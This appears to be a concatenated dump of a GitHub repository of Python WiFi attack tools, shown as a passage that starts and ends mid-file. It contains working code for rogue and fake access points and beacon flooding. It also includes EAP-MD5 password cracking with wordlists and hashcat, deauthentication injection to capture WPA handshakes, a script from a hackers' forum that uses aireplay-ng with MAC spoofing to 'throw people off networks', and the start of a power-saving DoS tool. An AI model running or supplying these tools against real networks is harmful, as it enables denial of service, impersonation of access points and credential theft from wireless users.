'255.255.255.0'], stdout=DN, stderr=DN) 178 | Popen(['ifconfig', 'at0', 'mtu', '1400'], stdout=DN, stderr=DN) 179 | 180 | def sniffing(interface, cb): 181 | sniff(iface=interface, prn=cb, store=0) 182 | 183 | def mon_mac(mon_iface): 184 | ''' 185 | http://stackoverflow.com/questions/159137/getting-mac-address 186 | ''' 187 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 188 | info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15])) 189 | mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1] 190 | return mac 191 | 192 | def cleanup(signal, frame): 193 | # with open('/proc/sys/net/ipv4/ip_forward', 'r+') as forward: 194 | # forward.write(forw) 195 | # os.system('iptables -F') 196 | # os.system('iptables -X') 197 | # os.system('iptables -t nat -F') 198 | # os.system('iptables -t nat -X') 199 | os.system('pkill airbase-ng') 200 | os.system('pkill dhcpd') # Dangerous? 201 | rm_mon() 202 | sys.exit('\n['+G+'+'+W+'] Cleaned up') 203 | 204 | if __name__ == '__main__': 205 | global ipf, mon_iface, ap_mac 206 | 207 | if os.geteuid() != 0: 208 | sys.exit('['+R+'-'+W+'] Run as root') 209 | 210 | channel = '1' 211 | if args.channel: 212 | channel = args.channel 213 | essid = 'Free Wifi' 214 | if args.essid: 215 | essid = args.essid 216 | 217 | monitors, interfaces = iwconfig() 218 | rm_mon() 219 | inet_iface, ipprefix = internet_info(interfaces) 220 | ap_iface = AP_iface(interfaces, inet_iface) 221 | if not ap_iface: 222 | sys.exit('['+R+'-'+W+'] Found internet connected interface in '+T+inet_iface+W+'. Please bring up a wireless interface to use as the fake access point.') 223 | 224 | 225 | mon_iface = start_monitor(ap_iface, channel) 226 | mon_mac1 = get_mon_mac(mon_iface) 227 | if args.targeting: 228 | hop = Thread(target=channel_hop, args=(mon_iface,)) 229 | hop.daemon = True 230 | hop.start() 231 | sniffing(mon_iface, targeting_cb) 232 | channel, essid, ap_mac = copy_AP() 233 | start_ap(mon_iface, channel, essid, args) 234 | 235 | 236 | raw_input('Press any key..') -------------------------------------------------------------------------------- /AP/fuzzap.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright 2013 Brendan Scherer 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | (at your option) any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | 17 | Small portion of code was taken from Core Security Technologies' Power-saving DoS. 18 | Their copyright follows, their code is marked below 19 | 20 | # Copyright (c) 2009 Core Security Technologies 21 | # 22 | # Author: Leandro Meiners (lea@coresecurity.com) 23 | # 24 | # Permission to use, copy, modify, and distribute this software for any 25 | # purpose with or without fee is hereby granted, provided that the above 26 | # copyright notice and this permission notice appear in all copies. 27 | # 28 | # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 29 | # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 30 | # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 31 | # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 32 | # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 33 | # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 34 | # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 35 | 36 | The common SSID list was pulled from https://wigle.net/gps/gps/Stat 37 | The OUI vendor list was parsed from http://standards.ieee.org/develop/regauth/oui/oui.txt 38 | for well known vendors (netgear, cisco, linksys, d-link, atheros, ralink, apple) 39 | 40 | ''' 41 | 42 | #!/usr/bin/python 43 | 44 | import signal 45 | import sys 46 | import time 47 | import logging 48 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 49 | from scapy.config import * 50 | from scapy.layers.dot11 import * 51 | from scapy.utils import * 52 | import argparse 53 | import random 54 | from multiprocessing import Process 55 | 56 | mlist = [] 57 | sid = [] 58 | ftime = time.time() * 1000000 59 | parser = argparse.ArgumentParser() 60 | parser.add_argument("interface", help="Specifies the interface in monitor mode to use") 61 | parser.add_argument("APs", help="Number of fake access points to create", type=int) 62 | 63 | args = parser.parse_args() 64 | ifce = args.interface 65 | APs = args.APs 66 | 67 | def uptime(): 68 | microtime = int(round(time.time() * 1000000)) - ftime 69 | return microtime 70 | 71 | def generate_mac(): 72 | 73 | try: 74 | #Grab a common OUI from file based off of the IEEE list at http://standards.ieee.org/develop/regauth/oui/oui.txt 75 | mac = random.choice(open("common.txt").readlines()) 76 | 77 | except IOError as ioe: 78 | print "Cannot read common.txt. Does the file exist? Do you have permissions? {0}: {1}".format(ioe.errno, ioe.strerror) 79 | 80 | iter = 0 81 | 82 | # We have to create the last three bits of the mac address since we grabbed the first three from file 83 | while iter < 3: 84 | 85 | #Generate a random integer between 0 and 255 to match the possible combinations for the MAC 86 | ranint = random.randint(0,255) 87 | int2 = 0 88 | 89 | #We have an exception in case the random integer is less than 16, as we would only get one character instead of two 90 | if ranint < 16: 91 | 92 | int2 = random.randint(0,15) 93 | mac += ":" + hex(ranint)[2:] + hex(int2)[2:] 94 | iter += 1 95 | 96 | else: 97 | 98 | mac += ":" + hex(ranint)[2:] 99 | iter += 1 100 | 101 | #When we return the mac, it has newlines due to reading from file. We need to strip those before we return the mac 102 | return mac.replace("\n", "") 103 | 104 | def beacon_frame(bssids,macaddrs,ifce): 105 | while True: 106 | for n in range(len(bssids)): 107 | sendp(RadioTap()/ 108 | Dot11(addr1="ff:ff:ff:ff:ff:ff", 109 | addr2=macaddrs[n], 110 | addr3=macaddrs[n])/ 111 | Dot11Beacon(cap="ESS", timestamp=uptime())/ 112 | Dot11Elt(ID="SSID", info=bssids[n])/ 113 | Dot11Elt(ID="Rates", info='\x82\x84\x0b\x16')/ 114 | Dot11Elt(ID="DSset", info="\x03")/ 115 | Dot11Elt(ID="TIM", info="\x00\x01\x00\x00"), 116 | iface=ifce, loop=0, verbose=False) 117 | time.sleep(.102) 118 | 119 | def load_vendor(num_of_aps): 120 | 121 | #Generate some mac addresses and shove them in a list 122 | for n in range(num_of_aps): 123 | mlist.append(generate_mac()) 124 | 125 | def load_ssid(num_of_aps): 126 | 127 | #Grab some random SSIDs from the wigle list and shove'm in a list 128 | for n in range(num_of_aps): 129 | sid.append(generate_ssid()) 130 | 131 | def generate_ssid(): 132 | 133 | try: 134 | #Pull a random SSID from a file with the top 1000 most common SSIDs from https://wigle.net/gps/gps/Stat 135 | 136 | ssid = random.choice(open("ssid.txt").readlines()) 137 | 138 | except IOError as ioer: 139 | print "Could not open ssid.txt. Does the file exist? Do you have the correct permissions? {0}: {1}".format(ioer.errno, ioer.strerror) 140 | 141 | #Return the SSID from file while stripping the new-line from the output 142 | return ssid.replace("\n", "") 143 | 144 | def probe_response(ssid, macs, rates, stamac, ifce): 145 | 146 | sendp(RadioTap(present=18479L)/ 147 | Dot11(addr2=macs, addr3=macs, addr1=stamac, FCfield=8L)/ 148 | Dot11ProbeResp(beacon_interval=102, cap=12548L, timestamp=uptime())/ 149 | Dot11Elt(info=ssid, ID=0)/ 150 | Dot11Elt(info=rates, ID=1)/ 151 | Dot11Elt(info='\x01', ID=3, len=1)/ 152 | Dot11Elt(info='\x00', ID=42, len=1)/ 153 | Dot11Elt(info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x02\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02(\x00', ID=48, len=24)/ 154 | Dot11Elt(info='H`l', ID=50, len=3), iface=ifce, loop=0, verbose=False) 155 | 156 | def sig_int(sigint, frame): 157 | print("Shutting down....") 158 | sys.exit(0) 159 | 160 | def main(): 161 | 162 | signal.signal(signal.SIGINT, sig_int) 163 | 164 | #load all of our MACs and SSIDs to spam 165 | load_vendor(APs) 166 | load_ssid(APs) 167 | 168 | #Fork out the beacon frames 169 | Process(target=beacon_frame, args=(sid,mlist,ifce)).start() 170 | 171 | #Start sniffing for probe request from our previously forked out beacon frames, and grab the ssid, rates, and MAC they are referencing 172 | while True: 173 | ssid = None 174 | rates = None 175 | macs = None 176 | 177 | #start sniffing 178 | p=sniff(iface=ifce, count=1)[0] 179 | 180 | #If the sniffed packet is a probe request and is sending it to one of our MAC addresses 181 | if p.haslayer(Dot11ProbeReq) and p.addr1 in mlist: 182 | pkt = p.getlayer(Dot11Elt) 183 | macs = p.addr1 184 | 185 | # Start Core Security's code 186 | while pkt: 187 | if pkt.ID == 0: 188 | 189 | #ID 0's info portion of a 802.11 packet is the SSID, grab it 190 | ssid = pkt.info 191 | if pkt.ID == 1: 192 | 193 | #ID 1's info portion of a 802.11 packet is the supported rates, grab it 194 | rates = pkt.info 195 | pkt = pkt.payload 196 | #End Core Security's code 197 | 198 | probe_response(ssid, macs, rates, p.addr2, ifce) 199 | 200 | main() -------------------------------------------------------------------------------- /EAP/eapmd5crack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -tt 2 | 3 | # eapmd5crack.py will crack a eap-md5 challenge response captured on the network 4 | # By Mark Baggett & Tim Tomes (LaNMaSteR53) available for download at www.LaNMaSteR53.com 5 | 6 | import md5, sys, time, logging 7 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 8 | from scapy.all import * 9 | 10 | def md5sum(value): 11 | hasher = md5.new() 12 | hasher.update(value) 13 | return hasher.digest() 14 | 15 | reqhash = {} 16 | resphash = {} 17 | 18 | if len(sys.argv) < 3: 19 | print """Syntax: python eapmd5crack.py /path/to/pcapfile.pcap /path/to/password.txt [-v] 20 | 21 | Example: 22 | Dictionary Attack - 23 | $ python eapmd5crack.py ./eapmd5_exchange.pcap ./dict.txt -v 24 | 25 | Brute Force Attack - 26 | $ mknod pwque p 27 | $ /pentest/passwords/jtr/john -i:All --stdout >> pwque & 28 | $ python eapmd5crack.py ./eapmd5exchange.pcap ./pwque 29 | """ 30 | sys.exit(2) 31 | 32 | pcapfile = sys.argv[1] 33 | passfile = sys.argv[2] 34 | verbose = False 35 | if len(sys.argv) > 3: 36 | if sys.argv[3] == '-v': 37 | verbose = True 38 | 39 | print "[-] Reading capture..." 40 | pwfile=open(passfile,"r") 41 | p=rdpcap(pcapfile) 42 | wordcount = 0 43 | eapExist = False 44 | 45 | print "[-] Searching for EAP-MD5 authentication exchange..." 46 | for packets in p: 47 | if packets.haslayer(EAP): 48 | if packets[EAP].type==4: 49 | reqid=packets[EAP].id 50 | if packets[EAP].code == 1: 51 | reqhash[reqid]=packets[EAP].load[1:17] 52 | eapExist = True 53 | print "[-] EAP authentication exchange found." 54 | print "[-] Message ID: " + str(reqid) 55 | print "[-] Challenge: " + reqhash[reqid].encode("hex") 56 | if packets[EAP].code == 2: 57 | resphash[reqid]=packets[EAP].load[1:17] 58 | print "[-] Needed Response: " + resphash[reqid].encode("hex") 59 | if raw_input("Would you like to crack this exchange? [Y/n]: ").upper() == "Y": 60 | cracked = False 61 | start = time.time() 62 | for line in pwfile: 63 | wordcount += 1 64 | currentpw = line.strip() 65 | if verbose: print "[+] Attempting password... " + currentpw 66 | if md5sum(chr(reqid) + currentpw + reqhash[reqid]) == resphash[reqid]: 67 | print "[-] Password found: " + currentpw 68 | cracked = True 69 | break 70 | stop = time.time() 71 | if cracked == False: print "[-] Password not found." 72 | time = stop - start 73 | print "\nAttempted %d passwords in %.2f seconds. [%d p/s]" % (wordcount, time, round(wordcount/time, 2)) 74 | sys.exit(2) 75 | 76 | if eapExist == False: print "[-] EAP authentication exchange not found. Quitting..." 77 | -------------------------------------------------------------------------------- /EAP/eapmd5hcgen.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # A.Ramos wwww.securitybydefault.com 3 | # Sat Jan 18 17:45:17 EST 2014 4 | # 5 | # Based on: 6 | # eapmd5crack.py will crack a eap-md5 challenge response captured on the network 7 | # By Mark Baggett & Tim Tomes (LaNMaSteR53) available for download at www.LaNMaSteR53.com 8 | # 9 | # Example: 10 | #root@kali:~# python eapmd5hcgen.py test-wlan0.pcap ToPwn eap.rule 11 | #[-] EAP authentication exchange found. 12 | #[-] Identity (username): SBD 13 | #[-] Message ID: 1 14 | #[-] Challenge: f99996473c372bb3ab3dded37c128cdb 15 | #[-] Needed Response: 821df8d42637472a7fe9921e19758e4d 16 | #[+] File with hash to crack created. 17 | #[+] File with rule created. 18 | #[*] Now run hashcat or oclhashcat: 19 | # 20 | #hashcat -m 10 --quiet --hex-salt --outfile-format 7 ToPwn /usr/share/wordlists/rockyou.txt -r eap.rule |awk -F: '{ print $3}'|sed -e 's|\x01||' 21 | # 22 | #oclhashcat -m 10 --quiet --hex-salt --outfile-format 7 ToPwn /usr/share/wordlists/rockyou.txt -r eap.rule |awk -F: '{ print $3}'|sed -e 's|\x01||' 23 | # 24 | #root@kali:~# hexdump -C eap.rule 25 | #00000000 5e 01 |^.| 26 | #00000002 27 | #root@kali:~# cat ToPwn 28 | #821df8d42637472a7fe9921e19758e4d:f99996473c372bb3ab3dded37c128cdb 29 | #root@kali:~# hashcat -m 10 --quiet --hex-salt --outfile-format 7 ToPwn /usr/share/wordlists/rockyou.txt -r eap.rule |awk -F: '{ print $3}'|sed -e 's|\x01||' 30 | #demo12345 31 | # 32 | 33 | import sys, logging, binascii 34 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 35 | from scapy.all import * 36 | 37 | reqhash = {} 38 | resphash = {} 39 | 40 | if len(sys.argv) < 3: 41 | print """Syntax: python eapmd5hcgen.py 42 | file.pcap: pcap file with eap-md5 handshake 43 | file: to be created with hash to crack 44 | file.rule: to be created with hashcat rules 45 | 46 | Example: 47 | $ python eapmd5hcgen.py ./capture.pcap ToPwn eapmd5rule.rule 48 | $ hashcat --outfile-format 7 ToPwn wordlists/rockyou.txt -r eapmd5.rule 49 | """ 50 | sys.exit(2) 51 | 52 | pcapfile = sys.argv[1] 53 | hashfile = sys.argv[2] 54 | rulefile = sys.argv[3] 55 | 56 | p=rdpcap(pcapfile) 57 | eapExist = False 58 | 59 | for packets in p: 60 | if packets.haslayer(EAP): 61 | if packets[EAP].type == 1: 62 | if packets[EAP].code == 2: 63 | identity = packets[EAP].load[0:20] 64 | if packets[EAP].type==4: 65 | reqid=packets[EAP].id 66 | if packets[EAP].code == 1: 67 | reqhash[reqid]=packets[EAP].load[1:17] 68 | eapExist = True 69 | print "[-] EAP authentication exchange found." 70 | print "[-] Identity (username): " + identity 71 | print "[-] Message ID: " + str(reqid) 72 | print "[-] Challenge: " + reqhash[reqid].encode("hex") 73 | if packets[EAP].code == 2: 74 | resphash[reqid]=packets[EAP].load[1:17] 75 | print "[-] Needed Response: " + resphash[reqid].encode("hex") 76 | 77 | if eapExist is False: 78 | print "[!] No EAP-MD5 found." 79 | sys.exit() 80 | 81 | fo = open(hashfile, "w") 82 | fo.write(resphash[reqid].encode("hex")+":"+reqhash[reqid].encode("hex")) 83 | fo.close() 84 | print "[+] File with hash to crack created." 85 | fo = open(rulefile, "wb") 86 | fo.write("^") 87 | fo.write(chr(reqid)) 88 | fo.close() 89 | print "[+] File with rule created." 90 | exit = """[*] Now run hashcat or oclhashcat: 91 | 92 | hashcat -m 10 --quiet --hex-salt --outfile-format 7 %s /usr/share/wordlists/rockyou.txt -r %s |awk -F: '{ print $3}'|sed -e 's|\\x%s||' 93 | 94 | oclhashcat -m 10 --quiet --hex-salt --outfile-format 7 %s /usr/share/wordlists/rockyou.txt -r %s |awk -F: '{ print $3}'|sed -e 's|\\x%s||' 95 | """ 96 | print exit % (hashfile, rulefile, str(reqid).rjust(2,'0'),hashfile, rulefile, str(reqid).rjust(2,'0')) 97 | 98 | 99 | -------------------------------------------------------------------------------- /EAP/eapy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | ############################################################################# 3 | ## ## 4 | ## eapy.py --- Simplistic 802.1X authentication client ## 5 | ## ## 6 | ## Copyright (C) 2002 Philippe Biondi ## 7 | ## ## 8 | ## This program is free software; you can redistribute it and/or modify it ## 9 | ## under the terms of the GNU General Public License as published by the ## 10 | ## Free Software Foundation; either version 2, or (at your option) any ## 11 | ## later version. ## 12 | ## ## 13 | ## This program is distributed in the hope that it will be useful, but ## 14 | ## WITHOUT ANY WARRANTY; without even the implied warranty of ## 15 | ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## 16 | ## General Public License for more details. ## 17 | ## ## 18 | ############################################################################# 19 | 20 | 21 | from socket import * 22 | from struct import * 23 | from md5 import md5 24 | 25 | 26 | ### Authentication parameters 27 | 28 | USER = "test" 29 | PASS = "toto" 30 | DEV = "eth1" 31 | 32 | 33 | ### Constants 34 | 35 | ETHERTYPE_PAE = 0x888e 36 | PAE_GROUP_ADDR = "\x01\x80\xc2\x00\x00\x03" 37 | 38 | EAPOL_VERSION = 1 39 | EAPOL_EAPPACKET = 0 40 | EAPOL_START = 1 41 | EAPOL_LOGOFF = 2 42 | EAPOL_KEY = 3 43 | EAPOL_ASF = 4 44 | 45 | EAP_REQUEST = 1 46 | EAP_RESPONSE = 2 47 | EAP_SUCCESS = 3 48 | EAP_FAILURE = 4 49 | 50 | EAP_TYPE_ID = 1 51 | EAP_TYPE_MD5 = 4 52 | 53 | 54 | ### Packet builders 55 | 56 | def EAPOL(type, payload=""): 57 | return pack("!BBH", EAPOL_VERSION, type, len(payload))+payload 58 | 59 | def EAP(code, id, type=0, data=""): 60 | if code in [EAP_SUCCESS, EAP_FAILURE]: 61 | return pack("!BBH", code, id, 4) 62 | else: 63 | return pack("!BBHB", code, id, 5+len(data), type)+data 64 | 65 | def ethernet_header(src, dst, type): 66 | return dst+src+pack("!H",type) 67 | 68 | 69 | ### Main program 70 | 71 | s=socket(AF_PACKET, SOCK_RAW, htons(ETHERTYPE_PAE)) 72 | s.bind((DEV, ETHERTYPE_PAE)) 73 | 74 | mymac=s.getsockname()[4] 75 | llhead=ethernet_header(mymac, PAE_GROUP_ADDR, ETHERTYPE_PAE) 76 | 77 | 78 | print "--> Sent EAPOL Start" 79 | s.send(llhead+EAPOL(EAPOL_START)) 80 | 81 | try: 82 | while 1: 83 | p = s.recv(1600)[14:] 84 | vers,type,eapollen = unpack("!BBH",p[:4]) 85 | if type == EAPOL_EAPPACKET: 86 | code, id, eaplen = unpack("!BBH", p[4:8]) 87 | if code == EAP_SUCCESS: 88 | print "Got EAP Success" 89 | elif code == EAP_FAILURE: 90 | print "Got EAP Failure" 91 | elif code == EAP_RESPONSE: 92 | print "?? Got EAP Response" 93 | elif code == EAP_REQUEST: 94 | reqtype = unpack("!B", p[8:9])[0] 95 | reqdata = p[9:4+eaplen] 96 | if reqtype == EAP_TYPE_ID: 97 | print "Got EAP Request for identity" 98 | s.send(llhead+ 99 | EAPOL(EAPOL_EAPPACKET, 100 | EAP(EAP_RESPONSE, 101 | id, 102 | reqtype, 103 | USER))) 104 | print "--> Sent EAP response with identity = [%s]" % USER 105 | elif reqtype == EAP_TYPE_MD5: 106 | print "Got EAP Request for MD5 challenge" 107 | challenge=pack("!B",id)+PASS+reqdata[1:] 108 | resp=md5(challenge).digest() 109 | resp=chr(len(resp))+resp 110 | s.send(llhead+ 111 | EAPOL(EAPOL_EAPPACKET, 112 | EAP(EAP_RESPONSE, 113 | id, 114 | reqtype, 115 | resp))) 116 | print "--> Send EAP response with MD5 challenge" 117 | else: 118 | print "?? Got unknown Request type (%i)" % reqtype 119 | else: 120 | print "?? Got unknown EAP code (%i)" % code 121 | else: 122 | print "Got EAPOL type %i" % type 123 | except KeyboardInterrupt: 124 | print "Interrupted by user" 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WiFi Scripts 2 | 3 | All WiFi moved to https://github.com/0x90/wifi-arsenal 4 | 5 | Python scripts and tools for WiFi. 6 | 7 | ## Dummy 802.11 sniffer 8 | 9 | ```python 10 | from scapy.all import * 11 | 12 | sniff(iface='eth0', 13 | prn=lambda x: 14 | x.sprintf("{Dot11Beacon:%Dot11.addr3%\t%Dot11Beacon.info%\tDot11Beacon.cap%}")) 15 | ``` 16 | -------------------------------------------------------------------------------- /analyse.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import dpkt 3 | import binascii 4 | from pprint import * 5 | 6 | interface = "mon0" 7 | observedclients = [] 8 | 9 | 10 | def sniffmgmt(p): 11 | if p.haslayer(Dot11): 12 | rawdata = p.build() 13 | tap = dpkt.radiotap.Radiotap(rawdata) 14 | #pprint(tap) 15 | if hasattr(tap, "ant_sig"): 16 | signal_ssi = -(256 - tap.ant_sig.db) # Calculate signal strength 17 | else: 18 | signal_ssi = 0 19 | if hasattr(tap, "channel"): 20 | channel = tap.channel 21 | else: 22 | channel = 0 23 | 24 | t_len = binascii.hexlify(rawdata[2:3]) # t_len field indicates the entire length of the radiotap data, including the radiotap header. 25 | t_len = int(t_len, 16) # Convert to decimal 26 | #pprint(t_len) 27 | wlan = dpkt.ieee80211.IEEE80211(rawdata[t_len:]) 28 | #pprint(tap.data) 29 | #wlan = dpkt.ieee80211.IEEE80211(tap.data.data) 30 | 31 | if wlan.type == 0 and wlan.subtype == 8: # Indicates a beacon 32 | #pprint(wlan) 33 | if hasattr(wlan, "ies"): 34 | if hasattr(wlan.ies, "info"): 35 | ssid = wlan.ies[0].info 36 | else: 37 | ssid = '' 38 | else: 39 | ssid = '' 40 | mac = binascii.hexlify(wlan.mgmt.src) 41 | print "%s, %s (%d dBm) %d" % (mac, ssid, signal_ssi, int(channel.freq)) # With the sniffmgmt() function complete, we can invoke the Scapy sniff() # function, pointing to the monitor mode interface, and telling Scapy to call 42 | 43 | 44 | sniff(iface=interface, prn=sniffmgmt) 45 | 46 | -------------------------------------------------------------------------------- /deauth/4whsg.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ######################################## 4 | # 5 | # This code is part of the SANS/GIAC Gold Paper titled 6 | # 7 | # Programming Wireless Security 8 | # 9 | # by Robin Wood (dninja@gmail.com), accepted May 2008 10 | # 11 | # For more information you can find the paper in the "Wireless Access" section of the 12 | # SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org 13 | # 14 | ######################################## 15 | 16 | import sys 17 | from scapy import * 18 | import pylorcon 19 | 20 | interface = "ath0" 21 | #interface = sys.argv[1] 22 | eapol_packets = [] 23 | handshake_found = 0 24 | 25 | injector = pylorcon.Lorcon("ath0", "madwifing") 26 | injector.setfunctionalmode("INJECT") 27 | injector.setmode("MONITOR") 28 | injector.setchannel(11) 29 | 30 | destination_addr = '\xff\xff\xff\xff\xff\xff' # i.e. broadcast 31 | bss_id_addr = '\x00\x0e\xa6\xce\xe2\x28' 32 | source_addr = bss_id_addr # The AP is sending the deauth 33 | 34 | packet = "\xc0\x00\x3a\x01" 35 | packet = packet + destination_addr 36 | packet = packet + source_addr 37 | packet = packet + bss_id_addr 38 | packet = packet + "\x80\xcb\x07\x00"; 39 | 40 | def deauth(packet_count): 41 | for n in range(packet_count): 42 | injector.txpacket (packet) 43 | 44 | 45 | mac = ":".join([i.zfill(2) for i in mac.split(":")]).lower() 46 | 47 | def sniffEAPOL(p): 48 | if p.haslayer(WPA_key): 49 | layer = p.getlayer (WPA_key) 50 | 51 | # First, check that the access point is the one we want to target 52 | AP = p.addr3 53 | if (not AP == bss_id_addr): 54 | print AP 55 | print "not ours\n" 56 | return 57 | 58 | if (p.FCfield & 1): 59 | # Message come from STA 60 | # From DS = 0, To DS = 1 61 | STA = p.addr2 62 | elif (p.FCfield & 2): 63 | # Message come from AP 64 | # From DS = 1, To DS = 0 65 | STA = p.addr1 66 | else: 67 | # either ad-hoc or WDS 68 | return 69 | 70 | if (not tracking.has_key (STA)): 71 | fields = { 72 | 'frame2': None, 73 | 'frame3': None, 74 | 'frame4': None, 75 | 'replay_counter': None, 76 | 'packets': [] 77 | } 78 | tracking[STA] = fields 79 | 80 | key_info = layer.key_info 81 | wpa_key_length = layer.wpa_key_length 82 | replay_counter = layer.replay_counter 83 | 84 | WPA_KEY_INFO_INSTALL = 64 85 | WPA_KEY_INFO_ACK = 128 86 | WPA_KEY_INFO_MIC = 256 87 | 88 | # check for frame 2 89 | if ((key_info & WPA_KEY_INFO_MIC) and 90 | (key_info & WPA_KEY_INFO_ACK == 0) and 91 | (key_info & WPA_KEY_INFO_INSTALL == 0) and 92 | (wpa_key_length > 0)) : 93 | print "Found packet 2 for ", STA 94 | tracking[STA]['frame2'] = 1 95 | tracking[STA]['packets'].append (p) 96 | 97 | # check for frame 3 98 | elif ((key_info & WPA_KEY_INFO_MIC) and 99 | (key_info & WPA_KEY_INFO_ACK) and 100 | (key_info & WPA_KEY_INFO_INSTALL)): 101 | print "Found packet 3 for ", STA 102 | tracking[STA]['frame3'] = 1 103 | # store the replay counter for this STA 104 | tracking[STA]['replay_counter'] = replay_counter 105 | tracking[STA]['packets'].append (p) 106 | 107 | # check for frame 4 108 | elif ((key_info & WPA_KEY_INFO_MIC) and 109 | (key_info & WPA_KEY_INFO_ACK == 0) and 110 | (key_info & WPA_KEY_INFO_INSTALL == 0) and 111 | tracking[STA]['replay_counter'] == replay_counter): 112 | print "Found packet 4 for ", STA 113 | tracking[STA]['frame4'] = 1 114 | tracking[STA]['packets'].append (p) 115 | 116 | 117 | if (tracking[STA]['frame2'] and tracking[STA]['frame3'] and tracking[STA]['frame4']): 118 | print "Handshake Found\n\n" 119 | wrpcap ("/var/gold/a.pcap", tracking[STA]['packets']) 120 | handshake_found = 1 121 | sys.exit(0) 122 | 123 | tracking = {} 124 | 125 | for i in range(1, 10): 126 | print "About to deauth\n\n" 127 | deauth(50) 128 | print "Deauth done, sniffing for EAPOL traffic" 129 | 130 | # reset the tracking between each sniffing attempt 131 | tracking = {} 132 | 133 | sniff(iface=interface,prn=sniffEAPOL, count=1000, timeout=30) 134 | 135 | print "No handshake found\n\n" 136 | -------------------------------------------------------------------------------- /deauth/dea.py: -------------------------------------------------------------------------------- 1 | #Simple script to throw people off networks via aireplay-ng's --deauth 2 | #Shitty script written by Claim (#koderz @ irc.rizon.net) the rest comes from the AirCrack-ng Team ofc (check them out at www.aircrack-ng.org!!! 3 | #This script was written for this thread right here > http://hackforums.net/showthread.php?tid=2738328&page=1 4 | #EDIT: This script depends on: Aircrack-ng, Xterm, Macchanger, Python and a few other applications that are installed on Backtrack5 :)* 5 | 6 | 7 | #! /bin/sh 8 | 9 | 10 | """:" 11 | exec python $0 ${1+"$@"} 12 | """ 13 | 14 | 15 | import subprocess, time, os 16 | 17 | print subprocess.call("airmon-ng") 18 | print '\n>>>Select your wireless interface<<<' 19 | interface = raw_input(">>>Interface: ") 20 | print '\n[+] Interface set to {0}!'.format(interface) 21 | time.sleep(1) 22 | 23 | class script: 24 | 25 | def anon(self): 26 | print '>>>Randomizing MAC-Address for {0}'.format(interface) 27 | os.system('ifconfig ' + interface + ' down') 28 | os.system('macchanger -r ' + interface) 29 | os.system('ifconfig ' + interface + ' up') 30 | print '\n[+] MAC-Address randomized!' 31 | time.sleep(2) 32 | 33 | def attack(self): 34 | print '>>>Enabling monitor mode on {0}'.format(interface) 35 | os.system("airmon-ng start " + interface) 36 | print '[+] monitor mode enabled for {0}'.format(interface) 37 | print '>>>Spoofing mon0...' 38 | time.sleep(2) 39 | commands_a = ['ifconfig mon0 down','macchanger -r mon0','ifconfig mon0 up'] 40 | for commands in commands_a: 41 | os.system(commands) 42 | print '[+] mon0 has been successfully spoofed!' 43 | print '>>>Scanning...' 44 | os.system("xterm -hold -e 'airodump-ng mon0' & disown") 45 | bssid_a = raw_input(">>>Select bssid of your target: ") 46 | os.system("xterm -hold -e 'macchanger -s mon0' & disown") 47 | bssid_h = raw_input(">>>Select your bssid (mon0): ") 48 | print '\n[+] Starting wireless assault on {0}!'.format(bssid_a) 49 | time.sleep(2) 50 | os.system('aireplay-ng --deauth 0 -a ' + bssid_a + ' -h ' + bssid_h + ' mon0') 51 | 52 | def main(self): 53 | main = script() 54 | main.anon() 55 | main.attack() 56 | 57 | if __name__ == '__main__': 58 | start = script() 59 | start.main() -------------------------------------------------------------------------------- /deauth/psdos.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2009 Core Security Technologies 2 | # 3 | # Author: Leandro Meiners (lea@coresecurity.com) 4 | # 5 | # Permission to use, copy, modify, and distribute this software for any 6 | # purpose with or without fee is hereby granted, provided that the above 7 | # copyright notice and this permission notice appear in all copies. 8 | # 9 | # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 10 | # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 11 | # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 12 | # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 13 | # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 14 | # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 15 | # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 16 | 17 | #!/usr/bin/env python 18 | 19 | import sys 